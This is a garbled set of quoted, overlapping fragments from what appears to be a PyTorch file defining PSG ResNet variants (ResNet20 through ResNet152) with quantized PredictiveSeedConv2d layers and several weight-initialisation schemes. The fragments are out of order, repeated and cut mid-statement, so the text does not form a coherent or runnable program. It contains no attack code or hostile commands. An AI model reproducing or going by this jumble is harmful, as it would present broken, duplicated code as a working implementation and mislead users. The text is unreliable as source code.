nn.Conv2d(in_planes, self.expansion*planes,", "= in_planes self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None)", "return bop_params def get_non_bop_params(self): non_bop_params = [] for m in", "self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes) if self.in_planes", "stride=1, input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes) if self.in_planes ==", "self.in_planes == 64: # self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1,", "SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes,", "num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD,", "stride in strides: layers.append(block(self.in_planes, planes, stride)) self.in_planes = planes *", "as np from models.masked_psg_seed_conv import PredictiveSeedConv2d from masked_layers import layers", "kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)", "numpy.lib.arraysetops import isin import torch import torch.nn as nn import", "with torch.no_grad(): new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach())", "\"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise ValueError(f\"{init_method} is not an initialization", "num_blocks[3], stride=2) self.linear = nn.Linear(512*block.expansion, num_classes) #self.linear = layers.Linear(512*block.expansion, num_classes)", "padding=1, bias=False) self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2 =", "nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise ValueError(f\"{init_method} is not an initialization option!\")", "init_method=\"standard\") -> None: for m in self.modules(): if isinstance(m, nn.Conv2d):", "NUM_BITS_GRAD = None BIPRECISION = False PREDICTIVE_FORWARD = False WRITER", "= predictive_backward MSB_BITS = msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD =", "non_bop_params def _make_layer(self, block, planes, num_blocks, stride): strides = [stride]", "out = F.relu(out) return out class Bottleneck(nn.Module): expansion = 4", "PSG in PyTorch. For Pre-activation ResNet, see 'preact_resnet.py'. Reference: [1]", "fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") std = gain", "stride=stride, padding=1, bias=False) self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False,", "writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1,", "strides = [stride] + [1]*(num_blocks-1) layers = [] for stride", "sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion = 1 def", "torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif init_method == \"kaiming_constant_unsigned\":", "init_method == \"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0", "None self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights reset to", "self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes, planes,", "SIGN PREDICTIVE_BACKWARD = predictive_backward MSB_BITS = msb_bits MSB_BITS_WEIGHT = msb_bits_weight", "# self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False) self.conv3 = conv1x1(planes,", "in_planes, planes, stride=1): super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes, planes, stride=stride,", "self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False) self.layer1 =", "= F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out)) out += self.shortcut(x) out =", "for m in self.modules(): if isinstance(m, nn.Conv2d): bop_params += list(m.parameters())", "def PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False,", "test(): net = ResNet18() y = net(torch.randn(1,3,32,32)) print(y.size()) # test()", "padding=1, bias=False) self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None)", "elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method ==", "nn.BatchNorm2d,)): non_bop_params += list(m.parameters()) return non_bop_params def _make_layer(self, block, planes,", "__init__(self, in_planes, planes, stride=1): super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes, planes,", "stride=stride, padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD,", "msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True ): global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD,", "= gain / math.sqrt(fan) with torch.no_grad(): module.weight.data = torch.ones_like(module.weight.data) *", "nn.BatchNorm2d(self.in_planes) if self.in_planes == 64: # self.conv1 = nn.Conv2d(3, 64,", "== 64: # self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1,", "64, num_blocks[2], stride=2) self.layer4 = None self.linear = nn.Linear(64, num_classes)", "SIGN = sign return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet152(", "planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) # self.conv3", "init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_uniform\":", "scale=scale, size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight)", "math.sqrt(2.0 / float(fan_in + fan_out)) with torch.no_grad(): module.weight.data = module.weight.data.sign()", "get_bop_params(self): bop_params = [] for m in self.modules(): if isinstance(m,", "out.view(out.size(0), -1) out = self.linear(out) return out def PsgSeedResNet20( num_classes=10,", "self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 64,", "nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\")", "F.relu(out) return out class Bottleneck(nn.Module): expansion = 4 def __init__(self,", "ValueError(f\"{init_method} is not an initialization option!\") def reset_conv_parameters(self, init_method=\"standard\") ->", "import torch.nn.functional as F import math import numpy as np", "None: out = self.layer4(out) # out = F.avg_pool2d(out, 4) out", "math.sqrt(fan) with torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif init_method", "stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def forward(self, x): out", "== \"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale", "self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)", "out = self.bn3(self.conv3(out)) out += self.shortcut(x) out = F.relu(out) return", "self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 32,", "= self.linear(out) return out def PsgSeedResNet20( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4,", "threshold SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck, [3,4,23,3],", "32 NUM_BITS_WEIGHT = 32 NUM_BITS_GRAD = None BIPRECISION = False", "num_blocks, in_planes=64, num_classes=10, init_method='standard'): super(ResNet, self).__init__() self.in_planes = in_planes self.conv1", "\"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale = gain / math.sqrt(2.0 *", "= conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes)", ") def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = F.relu(self.bn2(self.conv2(out)))", "64: # self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)", "elif init_method == \"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain =", "bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT,", "return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet152( num_classes=10, init_method='standard', predictive_backward=True,", "isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params += list(m.parameters()) return non_bop_params def _make_layer(self,", "stride=stride, padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD,", "MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD = msb_bits_grad THRESHOLD = threshold SPARSIFY", "predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes) if self.in_planes == 64: #", "out_planes, kernel_size=3, stride=stride, padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed,", "block, planes, num_blocks, stride): strides = [stride] + [1]*(num_blocks-1) layers", "bop_params += list(m.parameters()) return bop_params def get_non_bop_params(self): non_bop_params = []", "bias=False) self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2 = self._make_layer(block,", "init_method=\"kaiming_uniform\") -> None: if init_method == \"kaiming_constant_signed\": fan = nn.init._calculate_correct_fan(module.weight,", "= msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD = msb_bits_grad THRESHOLD =", "sign return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet50( num_classes=10, init_method='standard',", "math import numpy as np from models.masked_psg_seed_conv import PredictiveSeedConv2d from", "[3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4,", "torch.nn.functional as F import math import numpy as np from", "return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT,", "\"3x3 convolution with padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return", "self._make_layer(block, 128, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)", "= PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1, stride=stride,", "math.sqrt(fan) with torch.no_grad(): module.weight.data = torch.ones_like(module.weight.data) * std elif init_method", "torch.no_grad(): module.weight.data = torch.ones_like(module.weight.data) * std elif init_method == \"kaiming_normal\":", "layers.Linear(512*block.expansion, num_classes) elif self.in_planes == 16: self.layer1 = self._make_layer(block, 16,", "== 16: self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1) self.layer2 =", "return nn.Sequential(*layers) def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out =", "= math.sqrt(2.0 / float(fan_in + fan_out)) with torch.no_grad(): module.weight.data =", "self._make_layer(block, 16, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2)", "fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0 / float(fan_in + fan_out))", "msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes,", "out = F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out)) out += self.shortcut(x) out", "nn.init.xavier_normal_(module.weight) elif init_method == \"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std", "torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif init_method == \"standard\":", "stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution with no padding\" predictive_forward", "For Pre-activation ResNet, see 'preact_resnet.py'. Reference: [1] <NAME>, <NAME>, <NAME>,", "predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True ): global PREDICTIVE_BACKWARD,", "x): out = F.relu(self.bn1(self.conv1(x))) out = F.relu(self.bn2(self.conv2(out))) out = self.bn3(self.conv3(out))", "elif self.in_planes == 16: self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1)", "self.shortcut = nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False), conv1x1(in_planes,", "Recognition. arXiv:1512.03385 ''' from numpy.lib.arraysetops import isin import torch import", "PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD,", "= nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential() if stride != 1 or", "stride)) self.in_planes = planes * block.expansion return nn.Sequential(*layers) def forward(self,", "stride != 1 or in_planes != self.expansion*planes: self.shortcut = nn.Sequential(", "padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS,", "and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False,", "= module.weight.data.sign() * std elif init_method == \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5))", "): global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN PREDICTIVE_BACKWARD", "\"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0 / float(fan_in", "in_planes=16, num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4,", "= True MSB_BITS = 4 MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD =", "if isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params += list(m.parameters()) return non_bop_params def", "init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_laplace\":", "def test(): net = ResNet18() y = net(torch.randn(1,3,32,32)) print(y.size()) #", "planes, num_blocks, stride): strides = [stride] + [1]*(num_blocks-1) layers =", "msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes,", "if isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self): bop_params = []", "bop_params def get_non_bop_params(self): non_bop_params = [] for m in self.modules():", "layers # Fixed NUM_BITS = 32 NUM_BITS_WEIGHT = 32 NUM_BITS_GRAD", "self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4 = self._make_layer(block, 512,", "Fixed NUM_BITS = 32 NUM_BITS_WEIGHT = 32 NUM_BITS_GRAD = None", "== \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method == \"xavier_constant\": fan_in, fan_out =", "nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False) self.conv2 = conv3x3(planes, planes,", "print('conv weights reset to {}'.format(init_method)) def reset_parameters(self, module, init_method=\"kaiming_uniform\") ->", "= self.layer3(out) if self.layer4 is not None: out = self.layer4(out)", "[1]*(num_blocks-1) layers = [] for stride in strides: layers.append(block(self.in_planes, planes,", "SPARSIFY = sparsify SIGN = sign return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes,", "= F.avg_pool2d(out, out.size()[3]) out = out.view(out.size(0), -1) out = self.linear(out)", "= False WRITER = None WRITER_PREFIX_COUNTER = 0 # Tunable", "forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out)) out +=", "SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes,", "== \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_laplace\": fan", "4 MSB_BITS_GRAD = 8 THRESHOLD = 0.0 SPARSIFY = False", "msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module):", "super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None)", "num_classes=num_classes, init_method=init_method) def PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "32, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2) self.layer4", "num_classes) self.reset_conv_parameters(init_method) print('conv weights reset to {}'.format(init_method)) def reset_parameters(self, module,", "\"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale =", "= nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale = gain /", "np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method == \"xavier_normal\":", "init_method=init_method) def PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0,", "def PsgSeedResNet20( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False,", "threshold SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck, [3,8,36,3],", "F.relu(out) return out class ResNet(nn.Module): def __init__(self, block, num_blocks, in_planes=64,", "MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD = 8 THRESHOLD = 0.0 SPARSIFY", "= self.layer4(out) # out = F.avg_pool2d(out, 4) out = F.avg_pool2d(out,", "threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes, stride=1, input_signed=False,", "predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes, self.expansion*planes,", "self.bn2(self.conv2(out)) out += self.shortcut(x) out = F.relu(out) return out class", "stride=2) self.linear = nn.Linear(512*block.expansion, num_classes) #self.linear = layers.Linear(512*block.expansion, num_classes) elif", "= False SIGN = True def conv1x1(in_planes, out_planes, stride=1, input_signed=True,", "SIGN = True def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"):", "return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True,", "nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights reset to {}'.format(init_method)) def reset_parameters(self,", "# self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False) self.layer1", "Tunable PREDICTIVE_BACKWARD = True MSB_BITS = 4 MSB_BITS_WEIGHT = 4", "predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class", "== \"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0 /", "init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0,", "64, kernel_size=3, stride=1, padding=1, bias=False) self.layer1 = self._make_layer(block, 64, num_blocks[0],", "* std elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif", "out = F.relu(out) return out class ResNet(nn.Module): def __init__(self, block,", "torch.ones_like(module.weight.data) * std elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\")", "stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) self.shortcut = nn.Sequential()", "= self.layer1(out) out = self.layer2(out) out = self.layer3(out) if self.layer4", "+ fan_out)) with torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif", "kernel_size=1, bias=False) self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)", "_make_layer(self, block, planes, num_blocks, stride): strides = [stride] + [1]*(num_blocks-1)", "out = F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out = self.layer2(out) out", "self.layer4(out) # out = F.avg_pool2d(out, 4) out = F.avg_pool2d(out, out.size()[3])", "= sparsify SIGN = sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method)", "see 'preact_resnet.py'. Reference: [1] <NAME>, <NAME>, <NAME>, <NAME> Deep Residual", "fan) with torch.no_grad(): new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape) module.weight.data =", "self.bn3 = nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential() if stride != 1", "F import math import numpy as np from models.masked_psg_seed_conv import", "out = F.relu(self.bn1(self.conv1(x))) out = F.relu(self.bn2(self.conv2(out))) out = self.bn3(self.conv3(out)) out", "elif init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method ==", "msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True ): global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT,", "<NAME>, <NAME> Deep Residual Learning for Image Recognition. arXiv:1512.03385 '''", "<NAME>, <NAME>, <NAME> Deep Residual Learning for Image Recognition. arXiv:1512.03385", "module.weight.data.sign() * std elif init_method == \"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight,", "input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes, planes,", "init_method=init_method) def test(): net = ResNet18() y = net(torch.randn(1,3,32,32)) print(y.size())", "= sign return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method) def PsgSeedResNet18(", "self._make_layer(block, 512, num_blocks[3], stride=2) self.linear = nn.Linear(512*block.expansion, num_classes) #self.linear =", "predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def forward(self, x): out = F.relu(self.bn1(self.conv1(x)))", "self._make_layer(block, 64, num_blocks[2], stride=2) self.layer4 = None self.linear = nn.Linear(64,", "= self.bn2(self.conv2(out)) out += self.shortcut(x) out = F.relu(out) return out", "block, num_blocks, in_planes=64, num_classes=10, init_method='standard'): super(ResNet, self).__init__() self.in_planes = in_planes", "fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0 / float(fan_in +", "0.0 SPARSIFY = False SIGN = True def conv1x1(in_planes, out_planes,", "= sparsify SIGN = sign return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method)", "= sparsify SIGN = sign return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method)", "+ [1]*(num_blocks-1) layers = [] for stride in strides: layers.append(block(self.in_planes,", "4) out = F.avg_pool2d(out, out.size()[3]) out = out.view(out.size(0), -1) out", "conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution with padding\"", "''' from numpy.lib.arraysetops import isin import torch import torch.nn as", "PsgSeedResNet152( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True", "BasicBlock(nn.Module): expansion = 1 def __init__(self, in_planes, planes, stride=1): super(BasicBlock,", "in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION,", "# Fixed NUM_BITS = 32 NUM_BITS_WEIGHT = 32 NUM_BITS_GRAD =", "msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion =", "self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 =", "PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1, stride=stride, padding=0,", "self.bn1 = nn.BatchNorm2d(planes) # self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,", "= self.bn3(self.conv3(out)) out += self.shortcut(x) out = F.relu(out) return out", "for m in self.modules(): if isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method) def", "= nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False) self.conv2 = conv3x3(planes,", "def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = F.relu(self.bn2(self.conv2(out))) out", "stride=2) self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2) self.linear = nn.Linear(512*block.expansion,", "kernel_size=3, stride=stride, padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward,", "kernel_size=1, stride=stride, bias=False), conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes)", "self.bn1 = nn.BatchNorm2d(self.in_planes) if self.in_planes == 64: # self.conv1 =", "layers = [] for stride in strides: layers.append(block(self.in_planes, planes, stride))", "predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes, planes, stride=1,", "= conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes)", "num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4 =", "[stride] + [1]*(num_blocks-1) layers = [] for stride in strides:", "else: raise ValueError(f\"{init_method} is not an initialization option!\") def reset_conv_parameters(self,", "out = F.avg_pool2d(out, 4) out = F.avg_pool2d(out, out.size()[3]) out =", "self.bn2 = nn.BatchNorm2d(planes) self.shortcut = nn.Sequential() if stride != 1", "out = self.layer4(out) # out = F.avg_pool2d(out, 4) out =", "self.modules(): if isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params += list(m.parameters()) return non_bop_params", "SPARSIFY = sparsify SIGN = sign return ResNet(BasicBlock, [3,3,3], in_planes=16,", "BIPRECISION = False PREDICTIVE_FORWARD = False WRITER = None WRITER_PREFIX_COUNTER", "SIGN = sign return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet101(", "init_method=init_method) def PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0,", "input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER,", "nonlinearity=\"relu\") elif init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method", "\"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_laplace\": fan =", "out class Bottleneck(nn.Module): expansion = 4 def __init__(self, in_planes, planes,", "PsgSeedResNet18( num_classes=10, 